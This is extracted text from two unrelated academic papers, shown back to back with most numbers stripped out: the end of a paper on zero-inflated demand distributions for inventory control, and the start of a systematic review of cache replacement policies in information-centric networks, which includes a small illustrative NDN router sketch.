kullback–leibler dput/ltd (unit) (unit) (usd) of shortage/ cycle) divergence zitno/ zitnosum , . . simple exponential smoothing / simple exponential smoothing sum , . . croston’s /croston’s sum , . . proposed statistical distributions for the dput/ltd modeling. note that all performance measures using zitno/zitnosum favored our intermittent demand model. discussion we adapted our algorithm from (willemain, smart & schwarz, ), for the use of zitno and zitnosum distributions to model dput and ltd, respectively. our model optimizing of the annual total cost of expected inventory with shortage results in lower total costs and smaller shortages per cycle in almost all cases compared to traditional methods used to model intermittent demand such as simple exponential smoothing and its variant, croston’s method. table shows that the zitno/zitnosum statistical distribution method performs better than the traditional slow-moving inventory models when modeling intermittent dput and ltd. here, we must acknowledge that the standard methods also achieved good fill-rate with a satisfaction of the dput. 
however, in most cases, our proposal achieved lower total costs and smaller non-supplied quantities than traditional methods. our proposed method was effective regardless of the number of zeros contained in the dput data samples. the simple exponential smoothing and croston’s method approaches have been extensively employed in intermittent demand forecasting (balugani et al., ). however, they lack the properties of a statistical distribution, so they generally show low performance measures when used in stochastic inventory models, such as the one studied in this work. once we confirmed that the zitno statistical distribution achieved good yields in the considered inventory model, we studied how the parameter of variability and the proportion of zeros that defined this statistical distribution affected total costs, q and r decisions, and possible connections. the most important relationship found was between the proportion of zeros in dput, which shows the degree of intermittency of this variable, the square root of this same parameter and the reorder point decisions. this relationships were explained by a multiple linear regression model. at first glance, the low intermittency of dput has a positive proportionality related with the square root of the parameter of proportion of zeros in demand ( √ ν), and later it suffers a decay by increasing the intermittency of the dput (ν). this behavior is important to decision-makers that need to consider the degree of dput intermittency for their reorder point decisions. we confirmed that the parameter of variability of the zitno statistical distribution positively correlated with reorder point decisions. that is, as the variability of the non-zero dput increases, the rojas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. reorder points must also increase. the previous conclusion was logical since this indicator can protect shortages against scenarios of greater variability. however, it does not alter the ordered quantities or the total costs of the inventory policy. in our study, we looked at actual data from a real case study to corroborate our method’s performance. we think that the use of zitno statistical distribution is especially suitable for intermittent demand due to its capability for modeling non-zero and zero demand cases. we tested our method by calculating indicated statistical distribution, and achieved good ltd distribution adjustment results. we also obtained good results when the non-zero data were slightly asymmetrical and when the zero values of the dput showed a high proportion. our main objective was to create models as close to reality as possible, but we acknowledge that this topic of study is an area of ongoing research that need more empirical results in future research. in this context, it is necessary to study the adaptation to skewness and kurtosis of the non-zero data of an intermittent demand in diverse stochastic inventory models, for this and other mixture statistical distributions, because these characteristics of the probability distributions could directly affect the results obtained in r and s(r). another important limitation to point out is that the busy optimization method is for each item or product in a particular way. for this reason, it would be important to consider multi-product stochastic programming in future research considering our proposed zitno and zitnosum statistical distributions. 
in the future, we plan to address some limitations shown in this study, such as the assumption of constant lt, which we used to model the ltd as a sum of dput. conclusion in this paper, we developed a new methodological framework for intermittent demand modeling. we were able to generate an ltd jitter in the case of an intermittent dput. we used numerical experiments to show that our proposed statistical distributions zitno and zitnosum leads to better results in a continuous revision inventory model with shortage. in particular, we used the multi-criteria topsis method across multiple scenarios with different proportions of zeros in the dput and cost of ordering, storing, and shortage parameters. in slow-moving items modeled by our proposal of statistical distribution, decisions q and r are affected by the level of intermittent demand. both decrease but not proportionally in the case of the decision of r, because the proportion of zeros in the dput is a parameter that affects the variability of the ltd. rojas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. additional information and declarations funding this work was supported by fondecyt initiation project code: , chile. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: fondecyt initiation project code: , chile. competing interests the authors declare there are no competing interests. author contributions • fernando rojas conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • peter wanke conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. • giuliani coluccio and juan vega-vargas performed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. • gonzalo f. huerta-canepa performed the experiments, analyzed the data, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: a total of scenarios simulated of dput with diverse level of intermittency and actual data of an illustrative example are available in the supplemental files. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references aiken ls, west sg, reno rr. . multiple regression: testing and interpreting interac- tions. london: sage. aloulou ma, dolgui a, kovalyov my. . a bibliography of non-deterministic lot-sizing models. international journal of production research ( ): – doi . / . . . antosz k, ratnayake rc. . spare parts criticality assessment and prioritization for enhancing manufacturing systems availability and reliability. journal of manufactur- ing systems : – doi . /j.jmsy. . . . rojas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . / . . http://dx.doi.org/ . /j.jmsy. . . http://dx.doi.org/ . /peerj-cs. aye gc, gupta r, wanke p. . 
efficiency in south african agriculture: a two-stage fuzzy approach. benchmarking: an international journal ( ): – . ayu nariswari np, bamford d, dehe b. . testing an ahp model for aircraft spare parts. production planning & control ( ): – doi . / . . . babai mz, syntetos a, teunter r. . intermittent demand forecasting: an empirical study on accuracy and the risk of obsolescence. international journal of production economics : – doi . /j.ijpe. . . . balugani e, lolli f, gamberini r, rimini b, babai m. . a periodic inventory system of intermittent demand items with fixed lifetimes. international journal of production research ( ): – doi . / . . . bethea rm. . statistical methods for engineers and scientists. new york: routledge. cattani kd, jacobs fr, schoenfelder j. . common inventory modeling as- sumptions that fall short: arborescent networks, poisson demand, and single- echelon approximations. journal of operations management ( ): – doi . /j.jom. . . . cobb b. . mixture distributions for modelling demand during lead-time. journal of the operational research society : – . cobb b, rumí r, salmerón a. . inventory management with log-normal demand per unit time. computers and operations research : – doi . /j.cor. . . . croston jd. . forecasting and stock control for intermittent demands. journal of the operational research society ( ): – doi . /jors. . . de andrade lh, antunes jjm, wanke p. . performance of tv programs: a robust mcdm approach. benchmarking: an international journal ( ): – . devika k, jafarian a, hassanzadeh a, khodaverdi r. . optimizing of bullwhip effect and net stock amplification in three-echelon supply chains using evolutionary multi-objective metaheuristics. annals of operations research ( ): – doi . /s - - -y. ewbank h, roveda jaf, roveda srmm, ribeiro a, bressane a, hadi-vencheh a, wanke p. . sustainable resource management in a supply chain: a methodolog- ical proposal combining zero-inflated fuzzy time series and clustering techniques. journal of enterprise information management epub ahead of print jul . gregersen ng, hansen znl. . inventory centralization decision framework for spare parts. production engineering ( – ): – doi . /s - - - . hadley g, whitin t. . analysis of inventory systems. new jersey: prentice-hall. hahn g, leucht a. . managing inventory systems of slow-moving items. interna- tional journal of production economics : – doi . /j.ijpe. . . . johnson nl, kotz s, balakrishnan n. . continuous univariate distributions. vol. . new york: wiley. johnson la, montgomery dc. . operations research in production planning, scheduling and inventory control. new york: wiley. rojas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . . http://dx.doi.org/ . /j.ijpe. . . http://dx.doi.org/ . / . . http://dx.doi.org/ . /j.jom. . . http://dx.doi.org/ . /j.cor. . . http://dx.doi.org/ . /jors. . http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.ijpe. . . http://dx.doi.org/ . /peerj-cs. jonkman j, barbosa-póvoa ap, bloemhof jm. . integrating harvesting decisions in the design of agro-food supply chains. european journal of operational research ( ): – doi . /j.ejor. . . . khosravi a, koury r, machado l, pabon j. . prediction of hourly solar radiation in abu musa island using machine learning algorithms. journal of cleaner production : – doi . /j.jclepro. . . . kim s, kim h. . a new metric of absolute percentage error for intermit- tent demand forecasts. 
international journal of forecasting ( ): – doi . /j.ijforecast. . . . kourentzes n. . on intermittent demand model optimisation and selection. interna- tional journal of production economics : – doi . /j.ijpe. . . . langseth h, nielsen t, pérez-bernabé i, salmerón a. . learning mixtures of truncated basis functions from data. international journal of approximate reasoning : – doi . /j.ijar. . . . mosteller f, tukey jw. . data analysis and regression: a second course in statistics. in: addison-wesley series in behavioral science: quantitative methods. boston: addison-wesley publishing company. nahmias s. . production and operations analysis. new york: mcgraw hill. pavlas m, somplak r, smejkalova v, nevrly v, zaviralova l, kuudela j, popela p. . spatially distributed production data for supply chain models-forecasting with hazardous waste. journal of cleaner production : – doi . /j.jclepro. . . . ponte b, costas j, puche j, pino r, de la fuente d. . the value of lead time reduction and stabilization: a comparison between traditional and collaborative supply chains. transportation research part e: logistics and transportation review : – doi . /j.tre. . . . rojas f. . time dependence in joint replacement to multi-products grouped. the case of hospital food service. cogent engineering ( ): doi . / . . . rojas f, leiva v, wanke p, lillo c, pascual j. . modeling lot-size with time- dependent demand based on stochastic programming and case study of drug supply in chile. plos one ( ):e doi . /journal.pone. . salvatier j, wiecki tv, fonnesbeck c. . probabilistic programming in python using pymc . peerj computer science :e doi . /peerj-cs. . silver e, pyke d, peterson r. . inventory management and production planning and scheduling. new york: wiley. sobel mj. . fill rates of single-stage and multistage supply systems. manufacturing & service operations management ( ): – doi . /msom. . . spedicato ga. . markovchain: discrete time markov chains made easy. r package version . . . syntetos aa, babai z, boylan je, kolassa s, nikolopoulos k. . supply chain fore- casting: theory, practice, their gap and the future. european journal of operational research ( ): – doi . /j.ejor. . . . rojas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.ejor. . . http://dx.doi.org/ . /j.jclepro. . . http://dx.doi.org/ . /j.ijforecast. . . http://dx.doi.org/ . /j.ijpe. . . http://dx.doi.org/ . /j.ijar. . . http://dx.doi.org/ . /j.jclepro. . . http://dx.doi.org/ . /j.tre. . . http://dx.doi.org/ . / . . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /msom. . http://dx.doi.org/ . /j.ejor. . . http://dx.doi.org/ . /peerj-cs. teixeira c, lopes i, figueiredo m. . classification methodology for spare parts management combining maintenance and logistics perspectives. journal of manage- ment analytics ( ): – doi . / . . . Ünlü y. . zero-modified distributions for inventory control under intermittent demand. in: iie annual conference. proceedings. institute of industrial engineers- publisher, . wanke p. . consolidation effects: assessing the impact of tail dependence on inven- tory pooling using copulas. international journal of inventory research : – doi . /ijir. . . wen m, chen y, yang y, kang r, guo m. . optimization of spares varieties in the uncertain systems. journal of intelligent & fuzzy systems ( ): – . willemain tr, smart cn, schwarz hf. . a new approach to forecasting inter- mittent demand for service parts inventories. 
international journal of forecasting ( ): – doi . /s - ( ) -x. yang m. . statistical models for count time series with excess zeros. master diserta- tion, university of iowa, iowa, us. yoon kp, hwang c. . multiple attribute decision making: an introduction. vol. . sage publications. zeileis a, kleiber c, jackman s. . regression models for count data in r. journal of statistical software : – . zhang w, xiaofeng w. . simulation of the inventory cost for rotable spare with fleet size impact. academic journal of manufacturing engineering ( ): – . rojas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . . http://dx.doi.org/ . /ijir. . http://dx.doi.org/ . /s - ( ) -x http://dx.doi.org/ . /peerj-cs. contextual dimensions for cache replacement schemes in information-centric networks: a systematic review contextual dimensions for cache replacement schemes in information- centric networks: a systematic review stéfani pires , , artur ziviani and leobino n. sampaio department of computer science, federal university of bahia (ufba), salvador, brazil federal institute of bahia (ifba), salvador, brazil national laboratory for scientific computing (lncc), petrópolis, brazil abstract in recent years, information-centric networks (icns) have gained attention from the research and industry communities as an efficient and reliable content distribution network paradigm, especially to address content-centric and bandwidth-needed applications together with the heterogeneous requirements of emergent networks, such as the internet of things (iot), vehicular ad-hoc network (vanet) and mobile edge computing (mec). in-network caching is an essential part of icn architecture design, and the performance of the overall network relies on caching policy efficiency. therefore, a large number of cache replacement strategies have been proposed to suit the needs of different networks. the literature extensively presents studies on the performance of the replacement schemes in different contexts. the evaluations may present different variations of context characteristics leading to different impacts on the performance of the policies or different results of most suitable policies. conversely, there is a lack of research efforts to understand how the context characteristics influence policy performance. in this direction, we conducted an extensive study of the icn literature through a systematic literature review (slr) process to map reported evidence of different aspects of context regarding the cache replacement schemes. our main findings contribute to the understanding of what is a context from the perspective of cache replacement policies and the context characteristics that influence cache behavior. we also provide a helpful classification of policies based on context dimensions used to determine the relevance of contents. further, we contribute with a set of cache-enabled networks and their respective context characteristics that enhance the cache eviction process. subjects computer networks and communications, emerging technologies keywords information-centric network, cache replacement policy, context awareness introduction the internet architecture was originally designed in a host-centric paradigm to support end-to-end communication. this model struggles to face key communication requirements of modern network applications such as high content distribution, node’s mobility, and network scalability. 
therefore, researchers have devoted effort studying future internet architectures as alternatives to the ip’s host-centric model. the current practice moves forward to a more content-centric approach since the massive internet usage is to disseminate content regardless of its location. information-centric networking how to cite this article pires s, ziviani a, sampaio ln. . contextual dimensions for cache replacement schemes in information- centric networks: a systematic review. peerj comput. sci. :e doi . /peerj-cs. submitted november accepted february published march corresponding author leobino n. sampaio, leobino@ufba.br academic editor arun somani additional information and declarations can be found on page doi . /peerj-cs. copyright pires et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:leobino@�ufba.�br https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ (icn) (ahlgren et al., ) is one of such initiatives. icn is a content-centric network communication model that stand out as potential candidate to substitute the current tcp/ip model (rahman et al., ). it consists of a receiver-driven networking model that focuses on the distribution and retrieval of contents through a publish-subscribe paradigm. in icns, a content request is based on the content’s name, not on its location, such as the content provider’s ip address. contents should have unique names, and any network node with the content can respond to the request. to this end, icn replicates content in a distributed way in cache-enabled routers (crs) over the network that are located closer to the user. therefore, delivering the closest content copies to the user saves communication resources, thus reducing network congestion, server loads, and access latency while providing better quality of service (qos) and quality of experience (qoe) levels. in addition, beyond the benefits of in-network caching, decoupling the content delivery process from the content location brings native support to mobility and multicast packet forwarding. content-centric networking (ccn) and its successor named-data networking (ndn) (zhang et al., ) are examples of initiatives implementing icn concepts. in general, any network device can potentially work as a cr with a content store (cs) data structure to implement the cache service. the performance of cs plays a vital role in the overall packet forwarding engine to guarantee high-speed packet processing of icn architectures. according to pan, huang & li ( ), pan et al. ( ), the performance bottleneck of the packet forwarding systems relies on cs operation and should be the focus of icn optimization strategies. this way, icn-based initiatives strongly rely on cache replacement policies to manage the cs and keep relevant content available to the users. least recently used (lru) and least frequently used (lfu) (ioannou & weber, ) are examples of policies used in icns. the current literature presents a massive number of performance evaluations for cache replacement policies comparing different policies concerning different network contexts. a network context refers to a network type—for example, edge networks, internet of things (iot) networks, or vehicular ad-hoc networks (vanets)—instantiated with particular characteristics for a given purpose. 
a network context thus brings up a broader view that encompasses characteristics regarding the network type and other entities related to network performance (e.g., user habits while using the network). each performance evaluation may present distinct variations in the context characteristics, as well as different impacts on policy performances, including changes in performance rank. the variance of results indicates that the policies’ performance tends to vary according to the context’s characteristics, and the process of choosing the suitable policies should consider the context in which the caches operate. given the above, several works incorporated the adaptation of policies according to some context. for instance, beck et al. ( ) proposed a rule-based stream reasoning technique to allow ccn routers to dynamically switch between existing cache replacement policies to adapt to network traffic changes. moreover, moon et al. ( ) presented a cache management scheme for wireless ndns, in which common access points (aps) and user devices attached to the aps have available cache capacity. the authors advocated pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ that each device can choose to work with a different cache replacement policy to improve network performance. in addition to that, charpinel et al. ( ) proposed a software- defined networking (sdn) approach to provide programable cache replacement algorithms. the replacement algorithms are defined in a control plane. meanwhile, a ccn controller can modify the replacement schemes dynamically and allocate different strategies for each node. finally, pacifici & dán ( ) proposed autonomous caching in peering isps for collaborative deciding their replacement policies. although studies recognize the need to adopt policies according to the network context, the choice itself of a suitable scheme is not trivial. there is no explicit and general understanding of the relationship between the context characteristics and the policies. such understanding is essential to assist the choosing process and, consequently, adapt policies according to the context. more specifically, there are no overall directions or categorization in which context may influence policy behavior. yet, regardless of the isolated evidence of individual works reporting their contexts and impacts on the policies’ performance, there is no comprehensive work discussing a unified view of the different contextual characteristics and their effects on the policies. the delimitation of context characteristics and their common effect can enhance and substantiate the caching management and the design of caching solutions. despite the contributions of previous literature reviews related to caching policies and icn aspects (ahlgren et al., ; bari et al., ; zhang, li & lin, ; tyson et al., ; xylomenos et al., ; fang et al., ; amadeo et al., ; zhang, luo & zhang, ; abdullahi, arif & hassan, ; fang et al., ; ioannou & weber, ; amadeo, campolo & molinaro, ; saxena et al., ; din et al., ), there is a lack of guidelines to understand context characteristics and their effect on the cache replacement policies in icns. furthermore, surveys on web cache replacement policies (wang, ; podlipnig & böszörmenyi, ; balamash & krunz, ; panda, patil & raveendran, ) do not address this subject. 
to the best of our knowledge, there is no broad investigation on cache replacement schemes for the icn domain or an integrated vision of the impacts of different context characteristics in the policy choice process. as a result, the lack of suitable schemes hinders the more efficient use of available cache resources, and therefore the effective extraction of the caching service expected benefits. in this article, we present a systematic literature review (slr) that, in contrast to previous works, investigates evidence in the literature about the effects of context aspects on cache replacement schemes’ performance. slr is a straightforward and consistent process to compile evidence to answer a set of research questions and help further understand the evidence reported. to this end, we first cataloged the cache replacement schemes used in icns. the current literature presents various proposed strategies exploring different context aspects to enhance the eviction logic, aiming to achieve more potentially precise and customized techniques. we mapped context dimensions related to the content, network, node, and human aspects. we then categorized the respective context properties used by the replacement schemes proposed for icns. with the context properties, we provide a taxonomy of context dimensions and a policy categorization accordingly. taxonomies may support the choosing process in the absence pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ of the overall understanding of specific network contexts and what influences policy behavior. in addition to the taxonomy, we compiled the context variations with reported relevant impacts on the policies, especially those leading to changes in the policies’ performance rank. this slr was able to identify common context factors that differentiated the choice of best policy performance. even so, as expected, there is no single optimal strategy to meet the requirements of all surveyed network contexts, since the performance of the caching policies varied according to the characteristics of each network. last, we extended the slr results with the analysis of proper context dimensions to be explored by the eviction process in different emergent networks, such as information-centric internet of things (arshad et al., ; dong & wang, ), vehicular named-data networking (khelifi et al., ), and in-network cache-based edge computing solutions (zhou et al., ; zhang et al., ). these emergent networks have gained attention from the research and industry communities, fostering the evolution of heterogeneous icn solutions. the taxonomy and policy classification presented in this article can help to infer the choice among current or new policies adapted to these networks to ensure better network performance. hence, the contribution of this article is threefold. it (i) provides a classification of contexts to assist those engaged in the design of adaptive caching solutions for icn that target the more efficient use of available cache resources; (ii) substantiates the reasoning of the caching policy decision process during the design of caching systems by presenting and analyzing information from previous works; and (iii) contributes to the set of knowledge on caching systems regarding emergent networks and underpins context-aware caching solutions. the remainder of the article is organized as follows. background section presents the basic concepts of icn and cache replacement schemes. 
the following section outlines the slr methodology process, with the definition of the leading research questions. results and analysis section presents the slr results, with answers to the research questions and analysis of the main findings. in the ‘applications’ section, this work contributes with a discussion of emergent networks and the association with context dimensions that can be explored to enhance the cache eviction process. the following section discusses relevant research directions. finally, the last section concludes the article. background in this section, we present introductory concepts of icn architectures and cache replacement policies. information-centric networks information-centric networking is a new internet architecture proposal widely discussed in the literature designed to meet the current de facto usage pattern of the internet: the dissemination of content, such as videos and web pages. icn comprises interconnected core functionalities for content naming, caching, and routing/forwarding to natively provide a content dissemination network. in its fundamental concept, the content name becomes an essential element for network routing, enabling the decoupling of content pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ location from the content delivery process. allied to that, icn replicates contents in caches distributed across the network at the routers, and the closest copy will be returned when a user requests a content. beyond the advantages of caching that provide reductions of network congestion, server loads, and access latency, the premise of independence of content location paves the way for efficient content distribution. therefore, it adds advantages to icn architectures, such as native support for mobility and multicast communication. the informational rfc (rahman et al., ) presented by the internet research task force (irtf) information-centric networking research group (icnrg) discusses some approaches for the real-world deployment of icns and trial experiments. besides the clean-slate approach, there are directions for its coexistence with the tcp/ip—for example, the icn adoption as an overlay network. the overlay approach proposes icn islands deployed over existing ip infrastructure and connected using tunneling solutions. in this way, icn packets are encapsulated inside ip packets through icn/ip tunnels. madureira et al. ( ) propose a resembling overlay approach with an sdn-based core network connecting edge networks operating ndn. in that case, the sdn core network encapsulates the ndn packet. another approach is icn as an underlay network, with the icn islands connected to the internet through proxies or protocol conversion gateways. the literature presents several icn architectures, such as data-oriented network architecture (dona) (koponen et al., ), content mediator architecture for content- aware networks (comet) (garca et al., ), mobilityfirst (raychaudhuri, nagaraja & venkataramani, ), and the previously mentioned ndn. they explore different architectural decisions about the naming scheme, caching, and routing processes (xylomenos et al., ). overall, the support for in-network caching is an essential feature of icn design. in general, every router works with a cs structure to temporally store the contents. 
this way, when a router receives a content request, the router verifies whether the content is present in its own cs and immediately returns the content if stored locally. otherwise, the router will forward the request to another destination. among the different architectures, ndn stands out as a recent and promising trend to substitute (or coexist with) the current tcp/ip model. in ndn, each cr has three main structures to support in-network caching: the cs, the pending interest table (pit), and the forwarding information base (fib). figure illustrates an overview of the interaction among these structures. a content request comes in the form of an interest packet to the cr, which returns a copy of the content in a data packet—sent over the incoming interface of the interest packet—if the content is already present in its cs. otherwise, a new pit entry records the pending interest with the respective incoming interface, and the cr forwards the interest packet according to some name-based protocol. multiple interests for the same data are aggregated in the same pit entry. once the data packet arrives at the cr, the corresponding pit entry is satisfied by forwarding the data to the saved interfaces. the cs will, therefore, store the passing data according to some cache management protocol. there are different policies to tackle the management of the cs structure. they can be classified as placement and replacement policies. placement policies, also called insertion policies, target the decision of whether a passing content should be stored locally. examples of placement policies include leave copy everywhere (lce), probabilistic caching (prob), leave copy down (lcd) (laoutaris, syntila & stavrakakis, ), betweenness centrality (betw) (chai et al., ), probcache (psaras, chai & pavlou, ), and crcache (wang et al., b). on the other hand, replacement policies are methods used to choose which content to evict from the cache when new content needs to be stored and no more space is available. examples of replacement policies include lru, lfu, random, first-in-first-out (fifo), least recently/frequently used (lrfu) (lee et al., ), and recent usage frequency (ruf) (kang, lee & ko, ). this work focuses on replacement policies, as we detail in the following sections. cache replacement policies cache capacity tends to be a small fraction of the amount of distinct content distributed over the network. thus, it is essential to have an efficient eviction scheme among the cache management protocols. a replacement policy ensures that the content most expected to be accessed in the short term remains in the cache, and the policy will, therefore, elect to evict the content that is least expected to be accessed. the performance gain of a network of caches like icn depends on the reliability of the cache management, and different policies lead to different performance. traditional policies, such as lru, lfu, or fifo, are eviction strategies inherited from computer memory systems and are commonly used in the icn and web-proxy caching domains. these policies have been massively explored to analyze cache characteristics and the performance of complex network contexts through approximation models. however, they were not designed to fit the needs of a network of caches and do not explore its potential. thus, the literature presents a variety of newly proposed schemes.
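as a rough illustration of the interest/data processing just described (a minimal sketch under our own simplifications, not the implementation of any particular ndn forwarder), the following toy router keeps an lru-ordered cs, aggregates interests in a pit, and forwards misses through a longest-prefix lookup on the fib:

```python
from collections import OrderedDict

class ToyNdnRouter:
    def __init__(self, cs_capacity=2):
        self.cs = OrderedDict()   # content store: name -> data, kept in LRU order
        self.pit = {}             # pending interest table: name -> set of incoming faces
        self.fib = {}             # forwarding information base: name prefix -> upstream face
        self.cs_capacity = cs_capacity

    def on_interest(self, name, face):
        if name in self.cs:                          # cs hit: answer over the incoming face
            self.cs.move_to_end(name)                # refresh LRU position
            return ("data", self.cs[name], face)
        self.pit.setdefault(name, set()).add(face)   # aggregate interests for the same name
        prefix = max((p for p in self.fib if name.startswith(p)), key=len, default=None)
        return ("forward", self.fib.get(prefix), name)   # miss: forward upstream via the fib

    def on_data(self, name, data):
        faces = self.pit.pop(name, set())            # satisfy all aggregated interests
        if len(self.cs) >= self.cs_capacity:
            self.cs.popitem(last=False)              # replacement decision (here: LRU)
        self.cs[name] = data                         # cache the passing data
        return [("data", data, f) for f in faces]

r = ToyNdnRouter()
r.fib["/videos"] = "face-upstream"
print(r.on_interest("/videos/v1/seg0", "face-1"))    # miss -> forwarded upstream
print(r.on_data("/videos/v1/seg0", b"..."))          # satisfies the pending interest and caches
print(r.on_interest("/videos/v1/seg0", "face-2"))    # now a cs hit
```

the single line marked as the replacement decision is exactly the point where the policies surveyed in this article differ.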
[figure: packet forwarding engine at an ndn router (zhang et al., ).] jin et al. ( ) surveyed solutions for mobile caching in icn, and among the contributions, they briefly described sets of cache insertion and replacement policies. besides the usual lru, lfu, fifo, and simple random, the list of replacement policies includes lrfu, lru-k (o'neil, o'neil & weikum, ), time aware least recently used (tlru) (bilal & kang, ), aging popularity-based caching scheme (apc) (li, liu & wu, ), frequency-based-fifo (fb-fifo) (gomaa et al., ), and adaptive replacement cache (arc) (megiddo & modha, ). however, there is no broader study on replacement schemes for icn domains. this slr cataloged the schemes proposed for icn to investigate contextual influences on the policies. therefore, this work does not seek to discuss individual policies, and the reader can refer to the original literature for further information. systematic literature review methodology the slr methodology specifies a well-defined searching protocol, with the definition of research questions, search strings, and explicit inclusion criteria for articles, among other steps. the methodology used in this article follows an adaptation of previously adopted slrs in the software engineering discipline (kitchenham & charters, ; petersen et al., ). figure summarizes the adopted slr process. [figure: steps of the slr process—planning (research questions, inclusion criteria, scientific databases, keywords, search strings), search (conduct search, screening of papers, data extraction), and analysis of outcomes.] the planning process ensures delimitation of the search scope with the definition of leading research questions, inclusion criteria, and the necessary inputs to operate the search. the search process is the article triage phase to collect relevant works and extract meaningful data that match the research questions. the data analysis evaluates the extracted data to summarize the primary evidence and point out contributions. the following subsections detail the planning, searching, and analysis processes. planning process this study aims to map context information associated with the performance of cache replacement strategies to help the choosing and design process when applying icn. since the scope and definition of context information can be relative to the research domain, we intended to characterize relevant dimensions surrounding the cache replacement schemes. additionally, we also intended to identify the cache replacement strategies applied and their context characteristics, and to investigate reported evidence about how the identified context information influences the behavior of cache replacement policies in icns.
to this end, we defined the following research questions (rqs): rq : what is context from the perspective of a cache replacement policy? rq : which are the context characteristics used by the policies? rq : which are the cache replacement strategies applied for in-network caching in icn? rq : what context variations had effects on the performance of the cache replacement strategies? notice that the research questions correlate with each other in the sense that they rely on each other's outputs in different ways: the first three questions are prerequisites to answering the last one; answering rq requires a preliminary overview direction from rq and also the output of rq ; and the complete delimitation of context that answers rq is an iterative process that relies on the outcomes of rq and rq . after the definition of the research questions, we specified a list of relevant keywords based on the analysis of manually selected articles, and we defined the corresponding search strings using AND and OR operators, as shown in table . [table: search string example—(“icn” or “ndn” or “ccn” or “information centric” or “information-centric” or “named data” or “named-data” or “content centric” or “content-centric”) and (“cache” or “caching”) and (“replacement” or “eviction” or “performance” or “management” or “policy” or “policies”).] the search strings were meant to drive automatic searches on relevant research engines. we adapted the search strings according to the syntax of the scientific databases. the selection criteria included works written in english addressing any aspect of cache replacement policy comparison in icns. we also included articles proposing new schemes for the eviction process in icns as part of their contributions. searching process the first step of the searching process was applying the automatic searches as specified in the planning phase. we did not set a lower threshold for the publication year range in the search databases, and the upper bound was set to . we cataloged a total of , articles in this phase. in the following, the screening process comprised abstract reading and analysis of all matched articles, to filter them according to the inclusion criteria. upon abstract filtering, we obtained articles. those were potential works where we could find answers to the predefined research questions. finally, we performed full article reading and analysis of the potential works to extract relevant information and evidence about the research questions. as a result, we reached a total of articles pertinent to our research. additionally, we incremented the results by carrying out a non-systematic snowballing process on the read articles and search engines to update the set with new works not covered in the first search. this process resulted in the addition of two relevant documents. analysis process the resulting articles and their corresponding extracted data constituted the input for our study. in this phase, we categorized and correlated data from different articles to empirically mine relevant information patterns. we report our main findings regarding the research questions in the following section. results and analysis the slr process described in the previous section enabled us to answer the main research questions introduced in this manuscript. the following subsections describe the process to accomplish this.
rq : context dimensions many definitions of context have been given in the literature as well as different methods to model and design context-aware applications (abowd et al., ; bettini et al., ; dey, ; liu, li & huang, ; vieira, tedesco & salgado, ; alegre, augusto & clark, ; van engelenburg, janssen & klievink, ). although there is no single consensual definition, they all converge on the importance and benefits of integrating the awareness of any relevant information from relevant entities with the computational environment. as a result of the literature review analysis process, our definition of context comprises, in a broad sense, information that can be used by the policy as input data to direct the eviction process. also, it includes information “external” to the policy that can be used within a computational environment and could influence the policy’s performance. to understand and delimit what entities could represent the context from the perspective of cache replacement strategies, we direct the article reading and extraction of possibly relevant information based on leading questions related to the content. since the process of dealing with contents is the overall purpose of having caching policies, we placed content as a feedstock for caching policies, and we defined questions from the content’s point of view, as follows: � what content is being requested? in this dimension, we seek for characteristics of the content itself (and the application), such as content size, popularity, type; � when is the content requested? this dimension specifies time-related information regarding the content and its relation to the user—for instance, time of access, time of creation, or user delay to receive the content. � where is the content located and distributed? this dimension specifies network characteristics, such as topology and link capacity, and features about the node/routers that store the content, such as cache capacity and the number of interfaces. � who is requesting the content? also, who is publishing the content? this dimension relates to the human aspect, in which preferences, behavior, and routines are mapped as pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ a context dimension. the dimension can also refer to machine-to-machine communication, but, in this case, the characteristics overlap with information of the node contemplated in the previous dimension. therefore, we extracted relevant information that would apply to these dimensions and correlate with the cache replacement schemes. based on the extracted data, we characterized context dimensions according to four main categories: network, node, content, and human. figure illustrates the hierarchy of our classification. a context view is represented by current information of cached content in a particular node, which belongs to a network, and is accessed or produced by a user. each of these dimensions contains properties related to the cache eviction process in one or more of the surveyed articles. we detail the list of properties in the next subsection. additionally, we also consider icn architecture decisions as part of the context. the other cache-related protocols, such as placement policies or naming schemes, are relevant aspects and should be included as part of the context. 
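one way to picture the context view described above is as a small data model grouping the four dimensions; this is purely illustrative, and the field names below are our own assumptions rather than part of the surveyed taxonomy:

```python
from dataclasses import dataclass, field

@dataclass
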